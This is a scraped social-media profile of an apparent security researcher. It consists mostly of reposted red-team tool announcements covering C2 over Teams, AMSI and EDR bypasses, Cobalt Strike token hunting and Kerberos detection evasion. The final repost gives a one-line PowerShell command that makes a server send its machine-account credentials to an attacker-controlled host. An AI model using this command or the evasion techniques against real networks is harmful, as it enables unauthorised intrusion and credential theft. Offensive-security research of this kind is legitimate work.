@m3g9tr0n Profile picture

Spiros Fraganastasis

@m3g9tr0n

Team @hashcat! Eternal n00b and knowledge seeker! Age is just a number and motivation is the fuel! Whatever you do in your life, do not forget to be humble.

Similar User
kmkz photo

@kmkz_security

Will Schroeder photo

@harmj0y

DirectoryRanger photo

@DirectoryRanger

MDSec photo

@MDSecLabs

Brute Logic photo

@BRuteLogic

Marcello photo

@byt3bl33d3r

Swissky photo

@pentest_swissky

SpecterOps photo

@SpecterOps

Adam Chester 🏴‍☠️ photo

@_xpn_

Panos Gkatziroulis 🦄 photo

@netbiosX

Sean Metcalf photo

@PyroTek3

Rasta Mouse photo

@_RastaMouse

Ryan Cobb photo

@cobbr_io

Lee Chagolla-Christensen photo

@tifkin_

Matt Nelson photo

@enigma0x3

Pinned

After working for sometime on it, I am happy to announce my contribution to The Hacker Recipes project of a Mimikatz documentation tools.thehacker.recipes/mimikatz/modul….


Spiros Fraganastasis Reposted

I’ve always thought Seatbelt was a great situational awareness tool, I created a python implementation of it. Due to the nature of how I expect it to run, it only implements the remote modules, but I hope someone finds it useful. github.com/0xthirteen/Car…


Spiros Fraganastasis Reposted

''GitHub - cxnturi0n/convoC2: C2 infrastructure that allows Red Teamers to execute system commands on compromised hosts through Microsoft Teams.'' #infosec #pentest #redteam #blueteam github.com/cxnturi0n/conv…


Spiros Fraganastasis Reposted

BTW, the reason we are releasing a new version of ShellcodePack that soon is that since a few weeks Defender has launched a crackdown on most AMSI bypass methods available in opensource tools. Including Donut, Sliver, etc. We are thus releasing our own custom method that is not…

New ShellcodePack version coming out soon with: - Custom AMSI bypass to weaponize .NET assemblies - Obfuscated Python Shellcode launchers - File timestamp spoofing - Updated EDR bypass profiles #redteam

Tweet Image 1


Spiros Fraganastasis Reposted

🍯Introducing Respotter Respotter is a Responder honeypot! It helps you catch attackers and red teams as soon as they spin up Responder in your environment. github.com/lawndoc/Respot…


Spiros Fraganastasis Reposted

This project is best effort and community driven. All suggestions and commits to improve it are welcomed and encouraged. github.com/cbecks2/edr-ar…


Spiros Fraganastasis Reposted

If you encounter the default IIS Windows window, do not forget to add /haproxy and /netdata to your wordlist and scan them, if you gain unauthorized access here, you will earn a reward 🌹🥰 #bugbountytips #BugBounty Great find by @ynsmroztas

Tweet Image 1

Spiros Fraganastasis Reposted

An interesting issue I researched recently that hasn't really been mentioned before. KVM-over-IP devices, and how they can potentially impact an enterprise environment and lead to compromise. Take a look: blog.grumpygoose.io/hold-me-closer…


Spiros Fraganastasis Reposted

There are some interesting detections for U2U/UnPAC the hash in certipy/rubues/mimiktaz/impacket based on TGS ticket options (medium.com/falconforce/fa…). Did some tinkering and by removing a few flags you can shake detection while still recovering the NT hash from a TGT

Tweet Image 1

Spiros Fraganastasis Reposted

Active Directory Certificate Services (AD CS) - A Beautifully Vulnerable and Mis-configurable Mess logan-goins.com/2024-05-04-ADC…


Spiros Fraganastasis Reposted

I just released a blogpost where I describe how two open source tools can be easily converted to Reflective DLL to be loaded in memory with Cobalt Strike. sokarepo.github.io/redteam/2023/1… This post comes along with github.com/sokaRepo/Coerc… which exists thanks to @Prepouce_ work


Spiros Fraganastasis Reposted

I just released a series of 2 blog posts about increasing your stealth capabilities during offensive operations. I hope you will find something useful! sokarepo.github.io/redteam/2024/0…


Spiros Fraganastasis Reposted

"A (partial) Python rewriting of PowerSploit's PowerView" for @DefconParis github.com/ThePirateWhoSm…

Tweet Image 1

Spiros Fraganastasis Reposted

@Ze_Asimovitch and I have just released a new blog post on "How to create your own Mythic Agent en C" red-team-sncf.github.io/how-to-create-…


Spiros Fraganastasis Reposted

Monitor CobaltStrike beacon for Windows tokens and gain Kerberos persistence - @pentest_soka sokarepo.github.io/redteam/2024/0…


Spiros Fraganastasis Reposted

Hunting for user tokens with CS Beacon, by @pentest_soka #redteam #maldev sokarepo.github.io/redteam/2024/0…


Spiros Fraganastasis Reposted

👀The godap project from @MacmodSec is 🤌! "A complete TUI for LDAP." github.com/Macmod/godap


Spiros Fraganastasis Reposted

A few months ago I've created a "Pefect DLL Loader". You can find some details on my article that was just published today ! The full implem can be found directly in the @defcon workshop in my github ! Hope you will learn something in this 😊 riskinsight-wavestone.com/en/2024/10/loa…


Spiros Fraganastasis Reposted

Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵

Tweet Image 1

Loading...

Something went wrong.


Something went wrong.